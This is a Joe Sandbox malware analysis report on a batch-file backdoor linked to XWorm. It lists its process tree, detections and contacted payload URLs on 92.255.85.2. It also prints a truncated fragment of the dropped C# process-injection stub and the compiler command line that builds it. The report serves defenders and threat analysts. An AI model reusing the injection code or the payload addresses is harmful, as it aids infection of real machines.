            Software Packing            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1648674 Sample: 92.255.85.2.bat Startdate: 26/03/2025 Architecture: WINDOWS Score: 100 33 pki-goog.l.google.com 2->33 35 c.pki.goog 2->35 39 Suricata IDS alerts for network traffic 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 14 other signatures 2->45 9 cmd.exe 1 2->9         started        signatures3 process4 signatures5 49 Malicious encrypted Powershell command line found 9->49 51 Suspicious powershell command line found 9->51 53 Encrypted powershell cmdline option found 9->53 55 Bypasses PowerShell execution policy 9->55 12 powershell.exe 14 22 9->12         started        17 conhost.exe 9->17         started        process6 dnsIp7 37 92.255.85.2, 4372, 49717, 49722 SOVTEL-ASRU Russian Federation 12->37 29 C:\Users\user\AppData\...\strztqek.cmdline, Unicode 12->29 dropped 31 C:\Users\user\AppData\Local\...\strztqek.0.cs, C++ 12->31 dropped 57 Writes to foreign memory regions 12->57 59 Compiles code for process injection (via .Net compiler) 12->59 61 Injects a PE file into a foreign processes 12->61 19 MSBuild.exe 2 12->19         started        22 csc.exe 3 12->22         started        file8 signatures9 process10 file11 47 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 19->47 27 C:\Users\user\AppData\Local\...\strztqek.dll, PE32 22->27 dropped 25 cvtres.exe 1 22->25         started        signatures12 process13

            Screenshots

            Download Video

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            92.255.85.2.bat18%VirustotalBrowse
            92.255.85.2.bat17%ReversingLabsScript-BAT.Backdoor.Boxter

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\strztqek\strztqek.dll100%AviraTR/Dropper.Gen7

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://92.255.85.2/a.mp4100%Avira URL Cloudmalware
            http://92.255.85.2/k.exe100%Avira URL Cloudphishing
            http://92.255.85.20%Avira URL Cloudsafe
            http://92.255.85.2/Fox.exe100%Avira URL Cloudphishing

            Domains and IPs

            Download Network PCAP: filteredfull

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
            		208.89.73.19
            		truefalse
              		high
              pki-goog.l.google.com
              		142.250.80.35
              		truefalse
                		high
                c.pki.goog
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://92.255.85.2/a.mp4true
                  • Avira URL Cloud: malware
                  		unknown
                  92.255.85.2false
                    		high
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000003.00000002.1345688716.000002891AA97000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://92.255.85.2powershell.exe, 00000003.00000002.1345688716.0000028919607000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891A72D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1345688716.000002891AC63000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://92.255.85.2/Fox.exepowershell.exe, 00000003.00000002.1345688716.000002891A9FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891978E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1345688716.000002891AC63000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://go.micropowershell.exe, 00000003.00000002.1345688716.000002891A2D7000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/powershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1366118495.0000028929454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Licensepowershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/Iconpowershell.exe, 00000003.00000002.1345688716.000002891ADAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://oneget.orgXpowershell.exe, 00000003.00000002.1345688716.000002891AA97000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://aka.ms/pscore68powershell.exe, 00000003.00000002.1345688716.00000289193E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1345688716.00000289193E1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3715200506.0000000003451000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1345688716.000002891AC63000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://oneget.orgpowershell.exe, 00000003.00000002.1345688716.000002891AA97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://92.255.85.2/k.exepowershell.exe, 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: phishing
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                92.255.85.2
                                                		unknownRussian Federation
                                                		42097SOVTEL-ASRUtrue

                                                General Information

                                                Joe Sandbox version:42.0.0 Malachite
                                                Analysis ID:1648674
                                                Start date and time:2025-03-26 04:15:18 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 55s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:16
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:92.255.85.2.bat
                                                Detection:MAL
                                                Classification:mal100.bank.troj.expl.evad.winBAT@10/9@1/1
                                                EGA Information:
                                                • Successful, ratio: 50%
                                                HCA Information:
                                                • Successful, ratio: 93%
                                                • Number of executed functions: 13
                                                • Number of non-executed functions: 1
                                                Cookbook Comments:
                                                • Found application associated with file extension: .bat
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.204.23.20, 23.203.176.221, 208.89.73.19, 20.109.210.53, 52.165.164.15, 20.3.187.198, 204.79.197.222
                                                • Excluded domains from analysis (whitelisted): fp.msedge.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                • Execution Graph export aborted for target powershell.exe, PID 7872 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                23:16:28API Interceptor33x Sleep call for process: powershell.exe modified
                                                23:16:35API Interceptor9415580x Sleep call for process: MSBuild.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                92.255.85.292.255.85.2.ps1Get hashmaliciousUnknownBrowse
                                                • 92.255.85.2/cmd.bat
                                                cmd.batGet hashmaliciousXWormBrowse
                                                • 92.255.85.2/pq.exe
                                                92.255.85.2.batGet hashmaliciousXWormBrowse
                                                • 92.255.85.2/pq.exe
                                                https://energy.economictimes.indiatimes.com/redirect.php?url=///itemsidguest.comGet hashmaliciousUnknownBrowse
                                                • 92.255.85.2/cmd.bat
                                                92.255.85_1.2.batGet hashmaliciousXWormBrowse
                                                • 92.255.85.2/pq.exe
                                                92.255.85.2.ps1Get hashmaliciousXWormBrowse
                                                • 92.255.85.2/pq.exe
                                                v4mNsTzbsL.exeGet hashmaliciousXWormBrowse
                                                • 92.255.85.2/pq.exe
                                                92.255.85.2.ps1Get hashmaliciousXWormBrowse
                                                • 92.255.85.2/pq.exe
                                                92.255.85_3.2.ps1Get hashmaliciousXWormBrowse
                                                • 92.255.85.2/pq.exe
                                                cmd.batGet hashmaliciousXWormBrowse
                                                • 92.255.85.2/pq.exe

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                pki-goog.l.google.comfile.exeGet hashmaliciousCryptOne, LummaC Stealer, Socks5SystemzBrowse
                                                • 142.251.35.163
                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                • 142.250.80.67
                                                EFT Remittance_(Bobd)CQDM.htmGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                • 142.250.80.67
                                                https://protect.checkpoint.com/v2/r01/___https://lsems.gravityzone.bitdefender.com/xhfsdfMW5hMR*~*QDcqg1KugH/rhrqqgrWni2pyg1KugH/og75AgMRA37Cu37x!i2GzU2ZBRIJz0ZOA1YpCSoGOfZu2gE3yRpN701JyRpOm4ZZyRp4q0YpC41S1h5KD47KphMiO0J/ARo394ZuDi6WW41uA0ZCGZsV/hKq4hn5DVqi1SpSG0Iiq0YiNiZC33pyAQYOLfD5DVoOH4EWH45yy38iYhrWx0YiVg5yOT0VyRpOmZ1K2gpqsW5R/g5c81YGRQYOLV8umhLS2X6OG02WJ48S4XrSZhspDQYOHj0O/ZZO4YYpEY0i64ZCT0KSvgIWoXKR8hZi9SJ6HZ1WSYoWD07KS1LZBgs09XESu4KOBh0WJ1r02gq3CTL/54pS*~*WrB7gMqXfMGfR6WVW7iZWpyq45mYQYOHgoWvY6KEf1qKh5OXS2us02tyRp4vTYGnVYGm0Y4HX7SK0ZRyRpOuiEm/SKGC0si/irc90Z63XL9yRp36Z5KZYLlyRpOSWqSIQYOHXLW8X64mhKKzhEGBf0tBX24yV1utSEWG0ISpR7WMR0JDZ80OXrmQYsZyRp4G1suTX1tCYruxfYGJXr6O40SD056PXZOrREqxjZyAjpW7X1yrgYGuiJOUXJcUi50ORqOKTJ4LgJmWWrmJYJKJ0sSZVZuy08uNXK4G1LW5WEGWRYOST1SrY7KI400ERquY06iU32JCgLcxTZSX3EmVV0uCR8iWW2O9QYOHi8mrYLcRg5mPg5i9S0p5iqOo12G6i0ZyRp44TMh7RIqnV2iJX7/G4pK6j1BBWLC5R5qSg00pZJO2YqmTXZC2Zr/0310008uSX005S6Kt100zTKKDS2W2f0RBX7K/jolDfqqQWqSN31mHZr/4Ro4NXqm54p/VgLi01MKBTY3yRp35gLiTY76rW8OMZ5Z8j1uJWp6wR7uNi6GnjrOE4LuRRoRESZ4XjX5DVsqPW7/sfJi5V7c23pu3S1BCYZ/WYr0EV7J6h0mE1J4vV0WsQYSJQYSJWo0kXKb5hLqtXMqsYqSHRMN/Zr42RLV5SJcPfKS6WrmuZrCXiK4Rh2m*~*08WYXMSmg1q6Z1l5Z00*~*Y1WChJ0t0Ii6hES8XImMiM0QYryZ4EWO1KqsSZ0K00WfX5WS11C636i63Ep80qSYjo4mWE4111p6Y5tyRp4Y45c43py9fEqOV5351KGy1Km/R0S40H5DWqZC0JyGW1iAYIqCgMG7gZS*~*003CX1yMV0GDfsZyRp38f54wZJuS00O7R5cE1ol6jJ6XhMpD1p0vj0uXi0uZf6JyRp4GRZ6IgpC/0puyW0itV0JyR5VyR5V=dJ9a86J/5GGJ6/HFH867JHa95G57Ja897H65*~*G65b9/b7c9/a8J6JI56758*~*GFFJI?h=6&fru;n=6&fru;ithx=6___.YzJ1OnNlcXVhbGNvcnA6YzpvOjVjN2U0MGNlMGRhNDNkZDEwYjk3ODU0ZTRhMGNmYTFjOjc6MDQyMTpiZDMwNmQ3NDgyNWUwNmM1NzVmMTk0YTFiN2ZjZDQ3NWZjMzIzMTMzNjg2ZmY0ZTMyY2VmMDdmYWRhZDI0MTJjOmg6VDpUGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                • 172.217.16.195
                                                qoutation.jsGet hashmaliciousXWormBrowse
                                                • 142.250.64.99
                                                2hTQLYwtNS.exeGet hashmaliciousUnknownBrowse
                                                • 142.251.41.3
                                                Acgsys#receipt0191.htmlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                • 142.251.41.3
                                                mzJ9X7kc28.exeGet hashmaliciousLummaC StealerBrowse
                                                • 142.251.40.195
                                                2xHGY40ElK.exeGet hashmaliciousIris StealerBrowse
                                                • 142.251.40.227
                                                edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comhttps://www.canva.com/design/DAGip6DbGGY/U0pN74ofNkqBSFMzXXCnAw/view?utm_content=DAGip6DbGGY&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h777bcb50d3Get hashmaliciousInvisible JS, Tycoon2FABrowse
                                                • 208.89.73.25
                                                ggap4lbV49.exeGet hashmaliciousUnknownBrowse
                                                • 208.89.73.19
                                                PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                                • 208.89.73.17
                                                4wAvgisuKU.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                                • 208.89.73.19
                                                SecuriteInfo.com.FileRepMalware.14590.30096.exeGet hashmaliciousUnknownBrowse
                                                • 84.201.210.39
                                                SecuriteInfo.com.FileRepMalware.14590.30096.exeGet hashmaliciousUnknownBrowse
                                                • 217.20.57.18
                                                702cb6e..emlGet hashmaliciousHTMLPhisherBrowse
                                                • 208.89.73.19
                                                JpPY0mRA9f.exeGet hashmaliciousVidarBrowse
                                                • 208.89.73.19
                                                SolaraFixNew.batGet hashmaliciousSheetRatBrowse
                                                • 208.89.73.17
                                                1208_37832604.docGet hashmaliciousUnknownBrowse
                                                • 208.89.73.17

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                SOVTEL-ASRU92.255.85_1.2.exeGet hashmaliciousXWormBrowse
                                                • 92.255.85.2
                                                92.255.85.2.ps1Get hashmaliciousUnknownBrowse
                                                • 92.255.85.2
                                                cmd.batGet hashmaliciousXWormBrowse
                                                • 92.255.85.2
                                                92.255.85.2.batGet hashmaliciousXWormBrowse
                                                • 92.255.85.2
                                                92.255.85_1.2.batGet hashmaliciousXWormBrowse
                                                • 92.255.85.2
                                                92.255.85.2.ps1Get hashmaliciousXWormBrowse
                                                • 92.255.85.2
                                                v4mNsTzbsL.exeGet hashmaliciousXWormBrowse
                                                • 92.255.85.2
                                                92.255.85.2.ps1Get hashmaliciousXWormBrowse
                                                • 92.255.85.2
                                                92.255.85_3.2.ps1Get hashmaliciousXWormBrowse
                                                • 92.255.85.2
                                                cmd.batGet hashmaliciousXWormBrowse
                                                • 92.255.85.2

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):1.1940658735648508
                                                Encrypted:false
                                                SSDEEP:3:Nlllulbnolz:NllUc
                                                MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:@...e................................................@..........

                                                C:\Users\user\AppData\Local\Temp\RESBA33.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Wed Mar 26 04:31:33 2025, 1st section name ".debug$S"
                                                Category:dropped
                                                Size (bytes):1332
                                                Entropy (8bit):3.992660468201351
                                                Encrypted:false
                                                SSDEEP:24:HAFzW9nZfYzgDfHfmwKEsmNwI+ycuZhNcakSYPNnqS2d:7BYu/FKhmm1ulca3gqSG
                                                MD5:107DA92193B5E6B6A294BDEB0674A7E7
                                                SHA1:1699520AEE301BD34551693C333EFBD7EBE5340A
                                                SHA-256:B46D9B814744D8ADED152A791CB3DDB92FB4F2441AAB78BD30FEC05069C5B54E
                                                SHA-512:DAEB2E4696C227E3FBDE35BBEA435E0BC3C68AC8F50866FE0DFAA51A7D7868108D1E84E76D5FA359594ABBF2A6ABDA957B1C7C69066B5E70AB2B0D6AB64A3033
                                                Malicious:false
                                                Reputation:low
                                                Preview:L...%..g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........S....c:\Users\user\AppData\Local\Temp\strztqek\CSC690A104BD3BA4E08BCA82F5F59FD8A8.TMP..................'Y......!.gv..........4.......C:\Users\user\AppData\Local\Temp\RESBA33.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.t.r.z.t.q.e.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dyd0j3xu.5by.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svakhwtv.vaj.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\strztqek\CSC690A104BD3BA4E08BCA82F5F59FD8A8.TMP

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                File Type:MSVC .res
                                                Category:dropped
                                                Size (bytes):652
                                                Entropy (8bit):3.0940741100936107
                                                Encrypted:false
                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryzGak7Ynqq+XPN5Dlq5J:+RI+ycuZhNcakSYPNnqX
                                                MD5:F5052759C99803CF8511CEEB21B86776
                                                SHA1:2B8233635F1EF468512A23E87E4BB4D25798A3DE
                                                SHA-256:33810EBC860779AC9B02021DD31317DE288516D8F72E13ABBA60D57D6CC35A3E
                                                SHA-512:105114BC7E9476DFE29814D72A59023421BA96B9ED98C920041CAD960292A0BE6FE152B07A3AC2A7A73FA2F293DDD74FA2FAD7A607382911B77E85D788123318
                                                Malicious:false
                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.t.r.z.t.q.e.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.t.r.z.t.q.e.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                C:\Users\user\AppData\Local\Temp\strztqek\strztqek.0.cs

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):9122
                                                Entropy (8bit):4.613031027327575
                                                Encrypted:false
                                                SSDEEP:96:JO1vYGpHKU5fZBDeXWuaLN0lWeCAaEjcqQDJ7iiLYkhxdP7NFa/COAoTOyt13IPw:AaGu7vpcfDFfckhxdP7NA/CxoSytSPf4
                                                MD5:58B10EF6BA0DA88788F1AAC56CE7E2DB
                                                SHA1:48221936B98AAC14EAD7C4589513D074365414EC
                                                SHA-256:AE11144F426028E50E77D64A66AEB954E169F627F8ABFE403791032594834520
                                                SHA-512:19C28B5AF8E4243350EE13C423FD066CEF969A5C86DE5F7B2AC4E4FBF75FDA17E82A6A91FBD6034786B9BEEE77E2EB4B1CECD1CF0B901E2874B88DA3E338845E
                                                Malicious:true
                                                Preview:.using System.Diagnostics;..using System.Runtime.InteropServices;..using System;....namespace Stub..{.. public static class Look.. {.. #region API delegate.. private delegate int ResumeThreadHandler(IntPtr handle);.. private delegate bool SetWowThreadContextHandler(IntPtr thread, int[] context);.. private delegate bool SetThreadContextHandler(IntPtr thread, int[] context);.. private delegate bool GetWowThreadContextHandler(IntPtr thread, int[] context);.. private delegate bool GetThreadContextHandler(IntPtr thread, int[] context);.. private delegate int VirtualAllocExHandler(IntPtr handle, int address, int length, int type, int protect);.. private delegate bool WriteMemoryHandler(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);.. private delegate bool ReadMemoryHandler(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);.. private delegate

                                                C:\Users\user\AppData\Local\Temp\strztqek\strztqek.cmdline

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                Category:dropped
                                                Size (bytes):204
                                                Entropy (8bit):4.945462917559162
                                                Encrypted:false
                                                SSDEEP:6:pAu+H2L/6K2wkn23fuzsH0zxszIwkn23fuzIHn:p37L/6KRfUsUQfUIHn
                                                MD5:A45E41173D0E386E4AF0358B9F2CD3C8
                                                SHA1:285EFD4CE3BF119B2B14A058285E7A3E3FA78E17
                                                SHA-256:16B94A56556D68B434C6F0A8831DBDC3A7FFAE965F0313E63A90EAB1D5564F4D
                                                SHA-512:5A249A8D04AFBB728E629A4FA96D8BB5006D9E4571C16BF0C9844FD3F2745D3296F1671942E79EA0AE0655A2F1C314E9174146915A1B86EF032F0A6890FB2242
                                                Malicious:true
                                                Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\strztqek\strztqek.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\strztqek\strztqek.0.cs"

                                                C:\Users\user\AppData\Local\Temp\strztqek\strztqek.dll

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):8704
                                                Entropy (8bit):4.520686486467739
                                                Encrypted:false
                                                SSDEEP:192:HxhVsIlJlHlHlHlHldlglfbflnldIGNuBalMg5MqoexD:R1lJlHlHlHlHldlglfbflnlfABO5MqDB
                                                MD5:8535CBD3C939BA2379B8D1B2F1D1C49B
                                                SHA1:175B7C96E6951143B05C2074E11B18B60197934C
                                                SHA-256:38A878FEE21505F54EF4524AE4350E9267760855F873ED751163F8F3C73B2C1B
                                                SHA-512:032FB72C443711022FA77B1AE179B918A958D60E7BC5BE988EF471D5DF7D8D92FA3614DB4F6A5074DE9C78F1D1E2FFF54D7B09EB1A3C52D7EAAA5F8E53992035
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%..g...........!.................8... ...@....... ....................................@..................................8..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................8......H........$...............................................................0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0............8.............................(....(....(....}....~.....~....~....~..... ....~.........o,...-.s....z..<(..........4X(...... .............. .....(.....3.~......{......o....-!s....z~......{......o....-.s....z...)......~......{.......X..

                                                C:\Users\user\AppData\Local\Temp\strztqek\strztqek.out

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                Category:modified
                                                Size (bytes):704
                                                Entropy (8bit):5.23162059632457
                                                Encrypted:false
                                                SSDEEP:12:KJN/IR37L/6KRfUsUQfUIHuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBIdn6KRfUYfUIHuKax5DqBVKVrdFAw
                                                MD5:6FFBB40997F300798F7E3C1A13F623AE
                                                SHA1:99DD95F11717817480328E8C3D5AA3C51D358F42
                                                SHA-256:F5A65A8D4B5DF06721D4F1C21C5140B3D14DC3B01CDC21D34CD10B3E913B9FC2
                                                SHA-512:CA5521955111863DDD900582C06A5DBE0A82F01B20DB79EA84DE3E1AA229237FEFBB283FF67156CA10B60EFF046EE27B5FD59D7879076EB1847F594A9011C8C6
                                                Malicious:false
